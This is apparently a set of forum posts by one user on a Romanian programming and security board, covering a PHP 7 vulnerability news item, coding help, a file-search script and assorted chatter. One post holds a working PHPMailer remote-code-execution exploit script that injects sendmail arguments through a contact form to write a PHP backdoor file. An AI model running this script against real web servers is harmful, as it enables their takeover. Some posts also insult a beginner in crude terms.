MrGrj

Gotta love PHP not Three critical zero-day vulnerabilities have been discovered in PHP 7 that could allow an attacker to take complete control over 80 percent of websites which run on the latest version of the popular web programming language. The critical vulnerabilities reside in the unserialized mechanism in PHP 7 – the same mechanism that was found to be vulnerable in PHP 5 as well, allowing hackers to compromise Drupal, Joomla, Magento, vBulletin and PornHub websites and other web servers in the past years by sending maliciously crafted data in client cookies. Security researchers at Check Point's exploit research team spent several months examining the unserialized mechanism in PHP 7 and discovered "three fresh and previously unknown vulnerabilities" in the mechanism. While researchers discovered flaws in the same mechanism, the vulnerabilities in PHP 7 are different from what was found in PHP 5. Tracked as CVE-2016-7479, CVE-2016-7480, and CVE-2016-7478, the zero-day flaws can be exploited in a similar manner as a separate vulnerability (CVE-2015-6832) detailed in Check Point's August report. CVE-2016-7479—Use-After-Free Code Execution CVE-2016-7480—Use of Uninitialized Value Code Execution CVE-2016-7478—Remote Denial of Service The first two vulnerabilities, if exploited, would allow a hacker to take full control over the target server, enabling the attacker to do anything from spreading malware to steal customer data or to defacing it. The third vulnerability could be exploited to generate a Denial of Service (DoS) attack, allowing a hacker to hang the website, exhaust its memory consumption and eventually shut down the target system, researchers explain in their report [PDF]. According to Yannay Livneh of Check Point's exploit research team, none of the above vulnerabilities were found exploited in the wild by hackers. The check Point researchers reported all the three zero-day vulnerabilities to the PHP security team on September 15 and August 6. Patches for two of the three flaws were issued by the PHP security team on 13th October and 1st December, but one of them remains unpatched. Besides patches, Check Point also released IPS signatures for the three vulnerabilities on the 18th and 31st of October to protect users against any attack that exploits these vulnerabilities. In order to ensure the webserver’s security, users are strongly recommended to upgrade their servers to the latest version of PHP. Source

Preview: http://haskell.cs.yale.edu/wp-content/uploads/2011/03/HaskellVsAda-NSWC.pdf

sau @Ganav daca are timp.

It might be from being stuck at home with nothing to do over break, or it might be from an actual interest in low-level systems design, but I've taken it upon myself to learn more about OS implementation, starting with the bootloader. So, here we go. All of this information exists in various other places on the web, but there's no better way to learn than by teaching, right? Either way, this piece should serve as primer on what exactly a bootloader does and how to implement a relatively simple one (compared to a beast like GRUB which is ostensibly its own little operating system). Intregul tutorial

An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class. The first patch of the vulnerability CVE-2016-10033 was incomplete. This advisory demonstrates the bypass of the patch. """ usage = """ Usage: Full Advisory: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt PoC Video: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html Disclaimer: For testing purposes only. Do no harm. """ import time import urllib import urllib2 import socket import sys RW_DIR = "/var/www/html/uploads" url = 'http://VictimWebServer/contact_form.php' # Set destination URL here # Choose/uncomment one of the payloads: # PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) #payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR # Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR ###################################### # PHP code to be saved into the backdoor php file on the target in RW_DIR RCE_PHP_CODE = "<?php phpinfo(); ?>" post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE} # Attack data = urllib.urlencode(post_fields) req = urllib2.Request(url, data) response = urllib2.urlopen(req) the_page = response.read() Mai multe informatii, aici

Nu stiu VB, insa ai putea incerca sa nu citesti CPed ca Int pentru ca nu este. Deci: Dim CPed As Integer = ReadMemoryInt(&HB6F5F0, 4) Ar deveni: Dim CPed As Integer = BitConverter.ToInt32(ReadMemory(&HB6F5F0, 4), 0) Apoi: Dim Plm As String = Hex(CPed + &H540) Si apoi: Plm = "&H"+ Plm In final, convertesti in float si aia e

Un mic programel pentru a cauta in toate sub-directoarele dintr-un director dat o anumita fraza/cuvant: from os import walk from os.path import join import argparse def get_files(base_path, extension=None): for dirpath, _, filenames in walk(base_path): for filename in filenames: if filename.endswith(extension): yield join(dirpath, filename) def search_sentence_in_files(files, sentence): for filepath in files: with open(filepath) as fp: for line_number, line in enumerate(fp): if sentence in line: yield filepath, line_number, line.strip() def main(files, sentence): results = search_sentence_in_files(files, sentence) for filepath, line, content in results: print('[# FILE PATH #] {} ...'.format(filepath)) print('[# LINE NUMBER #] At line {}'.format(line)) print('[# LINE CONTENT #] Content: {}'.format(content)) print('-' * 80) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Search text in files') parser.add_argument('sentence') parser.add_argument('-p', '--basepath', help='folder in wich files will be examinated', default=r'default_path') parser.add_argument('-e', '--extension', help='extension of files to examine', default='.txt') args = parser.parse_args() files = get_files(args.basepath, args.extension) main(files, args.sentence) Poate fi rulat cu Python 2.x/3.x. Poate primi ca argumente: - cuvantul / fraza dorita - basepath (in ce director sa caute) - extensia fisierelor in care doriti sa cautati fraza / cuvantul dorit. De adaugat: - indexare - regex functionality Enjoy

http://karpathy.github.io/2015/05/21/rnn-effectiveness/ Preview:

Daca ne-ai spune si ce model de laptop ai poate am putea sa te ajutam

Ce relevanta au orgoliul, lenea si invidia ? Eu unul am muncit / muncesc pentru banii pe care ii fac. E alegerea mea daca prefer sa dau bani unor persoane straine, de pe strada, sau daca doresc sa-mi ajut familia, prietenii etc. Mai mult, habar nu ai ce mafie exista pe strazi. De multe ori, cersetorii sunt batuti (maini, pricioare rupe) in cel mai bun caz si pusi sa dea inapoi tot ceea ce primesc (chiar si mancare). Asa ca nu poti sa fi atat de impertinent venind aici si spunand ca oamenii din Romania au x mentalitate. Exista foarte multe stereotipuri, iar cei ca tine tind sa judece oamenii doar pentru ca ei cred ca e mai bine ceea ce spun. Fals. Vrei sa fii un om bun ? Ajuta-ti familia, prietenii, oamenii care te-au ajutat la randu' lor. Fa-ti un viitor si ajuta-te pe tine. Bafta.

De ce ?

Poti detalia putin ? 1. Vrei sursa de la PhantomJS modificata ? 2. Cum vei cripta scriptul ? 3. Care script ? 4. Va exista un singur algo de criptare ? Daca da, care e ala ? 5. Ce inseamna "in memorie" ? 6. La ce-ti foloseste asta ? Poate exista solutii existente deja si scapi de niste bani dati. Peace

#include <iostream> int main() { int n; std::cout << "Introduceti n:"; std::cin >> n; for (int i=0; i<=15; i++) { std::cout << n << " * " << i << " = " << n * i <<"\n"; } } Daca mai pui poza in loc de cod frumos formatat, imi bag pula si nu te mai ajut. Greseli facute de tine: - nu mai folosi using namespace std (pune std::<instruction>) - modul in care iti indentezi codul denota interesul acordat problemei (in cazul tau, 2 din 100) - asa cum ai scris codul (algoritmul), imi da semne ori ca esti prost, ori ca nu vrei sa intelegi, ori ca nu ai gandit deloc ceea ce ai scris acolo. De ce ? Vezi mai jos: 1. ai declarat n-ul de doua ori (e de-ajuns o data) 2. n = n+1 e acelasi lucru cu n++, asa ca poti pune direct n++. Ajuti compilatoru' sa nu mai faca transformarea pt tine. 3. in for, vrei sa inmultesti numarul dat de la tastatura (adica n) cu numerele de la 0 la 15, asa ca trebuie sa scrii asa cum ai vazut in codul de mai sus. Modul in care ai facut tu, e de cacat si nici nu merita comentat. 4. Mai nou, nu mai e nevoie sa returnezi 0, deoarece o face automat compilatorul. In cazul in care mai ai alte intrebari, deschide topic cu: "[Ajutor] Numele problemei pe care incerci sa o rezolvi" in Programare. e.g: [Ajutor] C++ - Afisare coaie degerate

https://repl.it/EjLO vs https://repl.it/EjLO/1

Hackers with WhatsApp. Ahahahahhahahahahahahahahahahahhahahahahahahaahahahahah

Si ce limbaje de programe faci tu acolo la intensiv info ?

Lasa Lasa ba new-line-urile! Inainte de asta, spune-i sa invete sa foloseasca un for(), ca daca ii ziceau aia sa faca tabla inmultirii unui numar pana la 100 si acum mai scria la codu' ala. Pe langa asta, invata sa postezi cum trebuie. Mie unu' mi-e sila cand vad useri care nu se straduiesc sa indenteze cum trebuie codu' postat aici. (asta daca vrei pareri legate de ceea ce ai postat) Macar ai incercat, e de apreciat. Ar fi frumos sa vad membri care se straduiesc sa invete si cer sfatul aici. La mai mult ! PS: Apropo, astea nu-s proiecte. Sunt exercitii basic pe care le invata un pusti de clasa a 5-a. (si le-ai facut...uhm, prost)

It was that very moment when I figured out my life wasn't meaningless:

Si mie-mi apare la fel ca lui @Fi8sVrs cand se incarca mai greu indexu'

E oke acum, cred ca era conexiunea de la berou de vina. #numazic

@Gecko Pe index, toate action-urile apar de 3 ori:

Am facut rost de un draft al unei carti noi si interesante de ML (machine learning). Contine 12 capitole si se axeaza pe: - cum sa faci ceva util folosind ML - cand sa folosesti ML - cum sa o folosesti in productie Relevant reddit: https://www.reddit.com/r/mlyearning/ Link: https://gallery.mailchimp.com/dc3a7ef4d750c0abfc19202a3/files/Machine_Learning_Yearning_V0.5_01.pdf Preview:

Fie-ti sederea usoara ! Bine-ai venit si spor la invatat Cum poti fi de folos cuiva de pe aceasta comunitate ? Ce stii sa faci ?

Cum am spus si pe chat: Era mai bine sa lase astia ziua nationala in 23 august, facea si romanul un gratar la bustul gol, sarbatorea cum se cuvine cu un porc, un lant de haur, manele, etc. <irony>Oricum, e important sa defilam cu tancuri vechi si arme chiar mai vechi, sa ne amintim de vremurile cand ne omoram ca prostii intre noi si sa stie toti dusmanii nostri (@aka tarile nebunele razboinicele) care au arme nucleare ca n-ar avea cum sa se puna cu noi. </irony> RIP.